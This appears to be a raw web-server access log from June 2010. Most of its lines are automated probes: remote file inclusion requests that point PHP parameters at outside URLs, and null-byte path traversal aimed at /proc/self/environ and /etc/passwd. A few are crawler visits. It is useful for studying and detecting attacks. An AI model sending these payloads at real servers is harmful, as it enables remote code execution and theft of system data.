75.126.138.51 - - [02/Jun/2010:06:55:24 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:24 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:24 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:24 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:24 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:26 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:26 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:26 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:55:27 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:55:27 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:55:27 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:36 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:36 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:36 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:55:44 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:55:44 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:55:44 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:56:06 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:56:06 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:56:06 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.105.40.177 - - [02/Jun/2010:06:56:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""WebRingChecker/1.71 LWP/5.79"
200.135.228.230 - - [02/Jun/2010:06:56:44 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:56:44 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:56:44 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:56:53 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:56:53 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:56:53 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:56:53 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:56:53 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:56:53 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:57:12 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:57:12 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:57:12 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:57:14 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:57:14 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:57:14 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:57:44 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:57:44 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:57:44 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:57:49 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:57:49 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:06:57:49 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:58:05 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:58:05 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:58:05 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:58:16 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:58:38 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
94.23.60.216 - - [02/Jun/2010:06:59:47 -0500] "GET /logs//index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.60.216 - - [02/Jun/2010:06:59:47 -0500] "GET //index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
216.129.119.43 - - [02/Jun/2010:07:00:22 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.131.77.225 - - [02/Jun/2010:07:00:36 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.131.77.225 - - [02/Jun/2010:07:00:36 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.204.230 - - [02/Jun/2010:07:02:41 -0500] "GET /logs/access_log.1167696000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.44.120.2 - - [02/Jun/2010:07:02:50 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:02:50 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
222.122.52.80 - - [02/Jun/2010:07:03:39 -0500] "GET //product.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:07:03:39 -0500] "GET /logs//product.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
163.24.136.10 - - [02/Jun/2010:07:04:55 -0500] "GET /logs//index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
163.24.136.10 - - [02/Jun/2010:07:04:55 -0500] "GET //index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
163.24.136.10 - - [02/Jun/2010:07:04:59 -0500] "GET /logs//index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
163.24.136.10 - - [02/Jun/2010:07:05:01 -0500] "GET //index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.52.108.58 - - [02/Jun/2010:07:05:42 -0500] "GET /logs/access_log.1204588800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.200.142.93 - - [02/Jun/2010:07:05:53 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.823"
209.44.120.2 - - [02/Jun/2010:07:06:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:06:20 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:06:20 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:07:48 -0500] "GET /logs/access_log.1274832000/?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:07:48 -0500] "GET /?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:07:48 -0500] "GET /logs/?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.805"
69.175.83.34 - - [02/Jun/2010:07:08:14 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:07:08:14 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.204.238 - - [02/Jun/2010:07:08:18 -0500] "GET /logs/access_log.1253318400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.83.34 - - [02/Jun/2010:07:08:19 -0500] "GET /logs/access_log.1271548800//components/com_hashcash/server.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:07:08:39 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:07:08:39 -0500] "GET /logs/access_log.1271548800//components/com_hashcash/server.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:07:08:39 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.44.120.2 - - [02/Jun/2010:07:10:18 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.199.50 - - [02/Jun/2010:07:10:41 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 200 577895 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.44.120.2 - - [02/Jun/2010:07:11:44 -0500] "GET /logs/access_log.1273363200/?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
204.93.174.47 - - [02/Jun/2010:07:12:24 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:07:12:24 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:07:12:24 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
204.188.235.66 - - [02/Jun/2010:07:12:50 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
222.122.52.80 - - [02/Jun/2010:07:13:10 -0500] "GET //auth.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:07:13:10 -0500] "GET /logs//auth.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.44.120.2 - - [02/Jun/2010:07:14:03 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:14:03 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:14:03 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
222.122.52.80 - - [02/Jun/2010:07:14:15 -0500] "GET //u_ins.php?MGR=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:07:14:16 -0500] "GET /logs//u_ins.php?MGR=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.132.187.170 - - [02/Jun/2010:07:14:58 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 356 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:07:15:05 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 351 "-""libwww-perl/5.65"
77.222.56.62 - - [02/Jun/2010:07:15:37 -0500] "GET //auth.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:07:15:53 -0500] "GET /logs//auth.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:16:08 -0500] "GET /logs/access_log.1274832000/?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:16:08 -0500] "GET /?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:16:08 -0500] "GET /logs/?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:07:17:44 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
222.122.52.80 - - [02/Jun/2010:07:17:51 -0500] "GET /config.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:07:17:52 -0500] "GET /logs/config.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
174.121.217.207 - - [02/Jun/2010:07:20:17 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
209.44.120.2 - - [02/Jun/2010:07:20:47 -0500] "GET /logs/access_log.1273363200/?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.19.31.123 - - [02/Jun/2010:07:20:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.19.31.123 - - [02/Jun/2010:07:20:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.122.52.80 - - [02/Jun/2010:07:20:59 -0500] "GET /smarty.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:07:21:00 -0500] "GET /logs/smarty.php?xcart_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
64.56.46.102 - - [02/Jun/2010:07:22:19 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
64.56.46.102 - - [02/Jun/2010:07:22:19 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.56.46.102 - - [02/Jun/2010:07:22:19 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.22.67.37 - - [02/Jun/2010:07:23:52 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:23:52 -0500] "GET /logs/access_log.1271548800/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:23:52 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
207.46.13.143 - - [02/Jun/2010:07:24:40 -0500] "GET /logs/access_log.1178409600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.22.67.37 - - [02/Jun/2010:07:24:58 -0500] "GET /logs/access_log.1270684800/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:25:02 -0500] "GET /logs/access_log.1272412800/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
204.188.235.66 - - [02/Jun/2010:07:25:20 -0500] "GET /*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.810"
207.46.204.234 - - [02/Jun/2010:07:25:30 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.56.46.102 - - [02/Jun/2010:07:25:35 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
89.200.142.93 - - [02/Jun/2010:07:25:41 -0500] "GET /*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:07:25:43 -0500] "GET /logs/*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.823"
64.22.67.37 - - [02/Jun/2010:07:25:45 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:25:45 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:25:45 -0500] "GET /logs/access_log.1271548800/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.46.13.42 - - [02/Jun/2010:07:26:10 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.22.67.37 - - [02/Jun/2010:07:26:56 -0500] "GET /logs/access_log.1270684800/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.22.67.37 - - [02/Jun/2010:07:27:01 -0500] "GET /logs/access_log.1272412800/modules/My_eGallery/index.php?basepath=http://www.foldingsecuritygate.com/media/sh/1.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
